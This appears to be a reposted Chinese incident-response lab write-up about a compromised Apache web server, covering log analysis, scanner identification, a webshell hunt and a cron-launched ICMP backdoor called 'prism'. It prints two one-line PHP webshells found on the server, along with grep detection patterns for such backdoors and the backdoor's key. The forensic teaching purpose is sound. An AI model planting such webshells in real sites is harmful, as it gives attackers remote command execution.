拓冰建站拓冰建站
首页 / 资讯中心 / 正文

任务13 应急响应案例3

任务13 应急响应案例31.事件背景A集团的WebServer服务器被黑客入侵该服务器的Web应用系统被上传恶意软件系统文件被恶意软件破坏您的团队需要帮助该公司追踪此网络攻击的来源在服务器上进行全面的检查包括日志信息、进程信息、系统文件、恶意文件等从而分析黑客的攻击行为发现系统中的漏洞并对发现的漏洞进行修复。下载链接 https://pan.baidu.com/s/1Upr1e4ZagIY0CGzbZ73bbg?pwdsqjd用户名密码root 1234562.应急响应过程2.1攻击者追踪与识别2.1.1攻击者 IP 地址识别可以从名为 access.log.1 的访问日志中提取IP地址并统计每个IP地址出现的次数。这样的命令输出会显示每个IP地址的出现次数帮助我们识别攻击者的IP地址。从 access.log.1 的访问日志中提取IP地址是因为通常服务器的访问日志会根据日期或者大小进行轮转例如access.log、access.log.1、access.log.2等其中 .1 文件通常代表前一天或前一段时间的访问记录。因此我们可以通过分析这些访问日志文件了解过去一段时间内服务器上的访问情况从而更好地识别攻击者的IP地址。cd /var/log/apache2awk -F {print $1} access.log.1 | sort | uniq -c根据提供的结果出现次数最多的IP地址是 192.168.1.7共出现了9051次。因此根据这个结果我们可以推断攻击者的IP地址是 192.168.1.7.2.1.2攻击者操作系统识别然后我们还可以从 access.log.1 的访问日志中筛选出所有包含IP地址为 192.168.1.7 的记录并且通过grep命令进一步筛选出其中包含 windows 或 linux 关键词的记录。通过执行这个命令我们可以识别攻击者使用的操作系统类型从而更好地了解攻击者的特征和行为。cat access.log.1 | grep 192.168.1.7 | grep -i windows\|linux根据提供的访问日志我们可以确认攻击者使用的操作系统是 Linux。这是通过日志中的用户代理字符串User-Agent字段显示了 Mozilla Firefox 浏览器在 Linux 系统上的运行。2.2攻击行为分析与确认2.2.1扫描工具识别我们可以从名为 access.log.1 的访问日志中提取出用户代理User-Agent字段并统计每个不同的用户代理出现的次数。这个命令输出的结果可以帮助我们识别攻击者资产收集所使用的平台即攻击者使用的是什么类型的设备或者工具来访问网站。awk -F {print $(NF-0)} access.log.1 | sort | uniq -c根据提供的查询结果我们可以得出以下结论攻击者资产收集平台主要是使用名为 DIRSEARCH 的工具出现了8994次。还发现了少量使用其他工具或者平台的请求如 python-requests/2.23.02次和 .NET4.0E)104次。此外还有一些来自常见的网络浏览器的请求如 Firefox/68.055次和 Safari/537.36108次。综合来看主要的攻击者资产收集平台是 DIRSEARCH 工具。2.2.2首次攻击成功的时间因为搜索 whoami 是一种常见的技术手段因为攻击者可能会在成功入侵系统后尝试执行这样的命令来获取当前用户的权限信息。当系统被入侵后攻击者通常会尝试执行一些特定的命令来探测系统的配置和权限并且 whoami 命令是其中之一用于获取当前登录用户的身份信息。因此通过搜索 whoami 可能会发现攻击者成功入侵系统并执行命令的痕迹从而确定攻击者首次成功攻击的时间。所以我们可以在名为 access.log.1 的访问日志中查找包含 whoami 字符串的记录并且使用 -C 5 参数来显示匹配行的前后各5行这样我们可以查看到攻击者首次攻击成功的时间以及周围的相关日志信息。grep -a whoami -C 5 access.log.1根据提供的结果我们可以得出以下结论攻击者首次成功攻击的时间是 2022年4月24日 15:26:50 (GMT)这是通过分析日志中的时间戳得出的。2.2.3恶意后门文件发现通过执行以下命令find / -name *.php | xargs grep system(\$_\|eval(\$_我们可以在服务器文件系统中搜索所有以 .php 结尾的文件并使用 grep 命令来查找其中包含 system(\$_ 或 eval(\$_ 字符串的文件。这样的命令可以帮助我们发现恶意后门文件因为这些字符串通常被攻击者用于执行系统命令或者动态执行 PHP 代码从而实现对系统的控制。find / -name *.php | xargs grep system(\$_\|eval(\$_命令详解、风险说明、优化写法、原理讲解一、原命令拆解find / -name *.php | xargs grep system(\$_\|eval(\$_1.分段解析find / -name *.php从**根目录/**全局递归查找所有后缀为.php的文件缺点会遍历系统所有目录包含/proc、/dev、挂载磁盘扫描极慢、大量无效文件、易出现权限报错。| xargs grep system(\$_\|eval(\$_管道把find查到的文件列表传给xargs批量用grep检索文件内容正则匹配system($_或eval($_作用查找PHP木马常用高危函数排查一句话木马、后门。2.正则说明system(\$_\|eval(\$_\$转义是变量符号不加转义会被shell解析\|grep基础正则的或目标特征system($_直接调用系统命令执行eval($_动态执行PHP代码一句话木马最常见特征二、原命令3个明显缺陷grep默认基础正则写法容错差基础正则中括号、竖线需要大量转义极易匹配失败无处理空格文件名文件名含空格、换行时xargs会把一个文件拆成多个参数命令报错、漏扫find全局扫描冗余/proc、/sys、/dev、挂载U盘等没必要扫描耗时巨大无权限抑制大量Permission denied刷屏干扰木马结果查看。三、优化稳定版命令推荐Linux排查PHP木马常用版本1基础安全标准版最常用find / -type f -name *.php ! -path /proc/* ! -path /sys/* ! -path /dev/* 2/dev/null | xargs -0 grep -lE system\(\$_|eval\(\$_版本2彻底兼容空格文件名零报错find / -type f -name *.php ! -path /proc/* ! -path /sys/* ! -path /dev/* 2/dev/null -print0 | xargs -0 grep -lE system\(\$_|eval\(\$_关键优化点说明-type f只匹配普通文件排除文件夹、软链接! -path xxx排除虚拟系统目录提速2/dev/null丢弃权限不足的错误日志-print0xargs -0以空字符分隔文件名完美兼容带空格、特殊符号的文件名grep -E启用扩展正则无需大量转义可读性更强grep -l只输出匹配到的文件名不输出文本内容方便定位木马文件四、拓展常用木马检索正则补充更多后门特征排查更全面的PHP后门可使用下面正则# 匹配 system、eval、assert、exec、shell_exec、passthru 高危函数 grep -lE system\(\$_|eval\(\$_|assert\(\$_|exec\(\$_|shell_exec\(|passthru\(五、补充实用小技巧只扫描网站目录如网站放在/www/wwwroot替换路径速度大幅提升find /www/wwwroot -type f -name *.php -print0 | xargs -0 grep -lE system\(\$_|eval\(\$_查看匹配到的具体恶意代码行去掉-l参数find /www/wwwroot -type f -name *.php -print0 | xargs -0 grep -nE system\(\$_|eval\(\$_-n会显示代码所在行号方便编辑删除后门。六、安全提醒该命令仅初步筛查加密变形木马base64、字符串拆分、回调函数绕过无法检出查到可疑文件后不要直接删除建议备份、溯源上传时间、权限、进程服务器发现大量PHP后门大概率存在文件上传漏洞、弱密码、SQL注入需要整体漏洞排查加固。rootwebserver:/var/log/apache2# find / -name *.php | xargs grep system(\$_\|eval(\$_ /var/www/html/data/avatar/1.php:?php system($_GET[2022]);? /var/www/html/footer.php:eval($_POST[catchmeifyoucan])根据提供的结果我们可以得出以下结论发现了两个恶意后门文件1. /var/www/html/data/avatar/1.php 文件中存在 ?php system($_GET[2022]);?这表示该文件允许通过 HTTP GET 请求执行系统命令。2. /var/www/html/footer.php 文件中存在 eval($_POST[catchmeifyoucan])这表示该文件允许通过 HTTP POST 请求动态执行 PHP 代码。这两个文件都具有恶意后门的特征可能被攻击者用来远程执行命令或者操控服务器。因此我们应当立即清除这些文件并加强系统的安全措施。2.3恶意程序识别与处理2.3.1恶意程序文件发现通过执行 crontab -l 命令可以列出当前用户的 cron 任务列表其中包括定时执行的任务。这些任务可能是系统维护任务也可能是恶意程序设置的定时任务。因此通过检查 cron 任务列表我们可以识别是否存在恶意程序进程的定时执行任务从而及时采取必要的安全措施来防范潜在的风险。根据提供的结果我们可以得出以下结论发现了一个恶意定时任务其中包含命令 cd /root/.mal/;./prism。这个任务在系统启动时 (reboot) 会将工作目录切换到 /root/.mal/然后执行 prism 程序。这表明可能存在恶意程序 prism它可能会在系统启动时被执行因此需要进一步调查和处理。2.3.2恶意文件的行为描述首先cd到文件所在目录cd /root/.mal 然后运行./prism Inf0来查看文件运行行为根据提供的结果我们可以得出以下分析和结论- Version: 0.5: 恶意文件的版本号是 0.5。这可能是恶意文件的版本信息用于标识恶意文件的版本。- Mode: icmp: 恶意文件的工作模式是 ICMP。这表明恶意文件可能会利用 ICMP 协议进行通信或者执行某些与 ICMP 相关的操作。- Key: p4ssw0rd: 恶意文件的密钥是 p4ssw0rd。这可能是用于身份验证或者加密通信的密钥用于访问或者操控受感染系统。- Shell: /bin/sh: 恶意文件指定了一个 shell 的路径为 /bin/sh。这表明恶意文件可能会执行一些系统命令或者 shell 脚本来执行其功能。- Detach: Yes: 恶意文件设置了 Detach 为 Yes。这表示恶意文件在运行时可能会分离或者脱离控制终端继续在后台执行。- Flush Iptables: No: 恶意文件设置了 Flush Iptables 为 No。这表示恶意文件可能不会清空 iptables 规则因此可能会绕过防火墙的检测。综上所述根据这些信息我们可以推断出恶意文件的一般行为是利用 ICMP 协议进行通信或者执行某些 ICMP 相关的操作使用密钥 p4ssw0rd 进行身份验证或者加密通信并且可能会执行一些系统命令或者 shell 脚本来执行其功能。同时它可能会在后台运行并且绕过防火墙的检测。3.结论根据以上分析结果我们可以得出结论该攻击事件是由 IP 地址为 192.168.1.7 的 Linux 系统用户发起的。攻击者利用名为 DIRSEARCH 的目录扫描工具对目标系统进行了侦察并在 2022年4月24日 15:26:50 (GMT) 成功入侵系统。进一步分析发现攻击者在网站中植入了恶意后门文件其中包括可以执行系统命令的 PHP 文件和可以动态执行 PHP 代码的文件。并且还留下了定时启动的恶意程序恶意文件的版本号为 0.5工作模式是 ICMP。它使用密钥 p4ssw0rd 进行身份验证或者加密通信。恶意文件在运行时可能会分离或者脱离控制终端继续在后台执行。它可能会执行一些系统命令或者 shell 脚本来执行其功能。另外恶意文件设置了不清空 iptables 规则因此可能会绕过防火墙的检测。为了防止进一步的损害我们应立即清除恶意文件并加强系统的安全防护措施。同时对系统进行全面审查以确认是否存在其他潜在的恶意活动。
分享:

看完干货,该让你的企业上线了

免费需求沟通 · 48 小时内出具建站方案 · 河南本地可上门